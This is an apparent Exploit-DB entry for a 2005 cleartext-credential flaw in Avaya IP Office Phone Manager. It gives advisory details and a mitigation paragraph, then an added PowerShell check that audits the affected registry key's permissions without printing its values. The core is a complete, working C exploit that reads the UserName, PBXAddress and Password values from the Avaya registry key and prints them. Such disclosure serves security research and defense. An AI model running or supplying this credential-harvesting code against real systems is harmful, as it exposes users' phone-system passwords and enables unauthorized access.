Vendor: IP Office Phone Manager
By: pagvac (Adrian Pastor)
CVSS: 5.5 (MEDIUM)
Cleartext Sensitive Data Vulnerability
CWE: 798
Product Name: IP Office Phone Manager
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Platforms Tested: Windows
2005

Avaya IP Office Phone Manager – Cleartext Sensitive Data Vulnerability Exploit v0.01

This exploit allows an attacker to retrieve sensitive data, such as usernames, IP addresses, and passwords, from Avaya IP Office Phone Manager. It works by opening the registry key HKEY_LOCAL_MACHINE\SOFTWARE\AVAYA\IP400\GENERIC with read access, querying the UserName, PBXAddress and Password values, and printing them to the console.

Mitigation:

The vendor should encrypt sensitive data stored in the Windows registry to prevent unauthorized access. Users should also ensure that only trusted individuals have access to the registry.
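
A defender-side check for the mitigation above, as an added example that is not part of the original advisory or the exploit author's code: it reports whether the registry key read by the exploit holds a non-empty Password value and whether broad groups are allowed to read it, without printing the stored values. The WOW6432Node path and the list of "broad" SIDs are assumptions.

```powershell
# Added example: audit the registry key read by the exploit source.
# Reports presence and ACL exposure only; it never prints the stored values.
$KeyPaths = @(
    'HKLM:\SOFTWARE\AVAYA\IP400\GENERIC',             # path from the exploit source
    'HKLM:\SOFTWARE\WOW6432Node\AVAYA\IP400\GENERIC'  # assumption: 32-bit view on 64-bit Windows
)
$SensitiveNames = 'UserName', 'PBXAddress', 'Password' # value names from the exploit source
# Assumption: these well-known SIDs are treated as "broad" readers.
$BroadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
}
$QueryValues = [int][System.Security.AccessControl.RegistryRights]::QueryValues

function Test-PhoneManagerKey {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return }   # key absent: nothing to report

    $key      = Get-Item -LiteralPath $Path
    $present  = @($SensitiveNames | Where-Object { $key.GetValueNames() -contains $_ })
    $password = [string]$key.GetValue('Password', '')

    # Resolve ACEs to SIDs so the check does not depend on localized account names.
    $acl   = Get-Acl -LiteralPath $Path
    $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
    $broad = @($rules | ForEach-Object {
        if ($_.AccessControlType -eq 'Allow' -and
            $BroadSids.ContainsKey($_.IdentityReference.Value) -and
            ([int]$_.RegistryRights -band $QueryValues)) {
            $BroadSids[$_.IdentityReference.Value]
        }
    } | Select-Object -Unique)

    [pscustomobject]@{
        Path             = $Path
        ValuesPresent    = $present -join ', '
        PasswordNonEmpty = ($password.Length -gt 0)
        BroadReaders     = $broad -join ', '
        Exposed          = ($password.Length -gt 0 -and $broad.Count -gt 0)
    }
}

$KeyPaths | ForEach-Object { Test-PhoneManagerKey -Path $_ } | Format-List
```

Run it from a 64-bit PowerShell session so that the first path is not silently redirected to the 32-bit registry view.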

Exploit-DB raw data:

#include <windows.h>
#include <stdio.h>
#include <string.h>

/*
    Filename:    exploit.c
    Title:       Avaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit v0.01
    Author:      pagvac (Adrian Pastor)
    Date:        24th Feb, 2005
    Other info:  tested on version 2.013. Compile as a Win32 console application project in Visual C++
*/

// Reads one string value from HKLM\SOFTWARE\AVAYA\IP400\GENERIC into lszValData.
// Returns FALSE if the key cannot be opened or the value cannot be read.
BOOL QueryVal(char lszVal2Query[255], char lszValData[255])
{
    char lszResult[255];
    HKEY hKey;
    LONG returnStatus;
    DWORD dwType = REG_SZ;
    DWORD dwSize = sizeof(lszResult) - 1;   // leave room for a terminator

    returnStatus = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\AVAYA\\IP400\\GENERIC", 0L, KEY_READ, &hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;                       // hKey is not valid here, so there is nothing to close

    returnStatus = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType, (LPBYTE)lszResult, &dwSize);
    RegCloseKey(hKey);
    if (returnStatus != ERROR_SUCCESS)
        return FALSE;                       // do not hand back an uninitialised buffer

    lszResult[dwSize] = '\0';               // registry strings are not guaranteed to be terminated
    strcpy(lszValData, lszResult);
    return TRUE;
}

int main(void)
{
    char valData[255];

    printf("\nAvaya IP Office Phone Manager - Cleartext Sensitive Data Vulnerability Exploit\n");
    printf("By pagvac (Adrian Pastor)\n");
    printf("Tested on version 2.013\n\n");

    // Print username
    printf("Username:\t");
    if (!QueryVal("UserName", valData))
        printf("Error! No permissions to read key value?\n");
    else
        printf("%s\n", valData);

    // Print IP address
    printf("PBX IP Address:\t");
    if (!QueryVal("PBXAddress", valData))
        printf("Error! No permissions to read key value?\n");
    else
        printf("%s\n", valData);

    // Print password
    printf("Password:\t");
    if (!QueryVal("Password", valData))
        printf("Error! No permissions to read key value?\n");
    else
    {
        if (strcmp(valData, "") == 0)
            printf("[blank password]\n\n");
        else
        {
            printf("%s\n", valData);
            printf("Password obfuscated?\n\n");
        }
    }

    return 0;
}

// milw0rm.com [2005-02-24]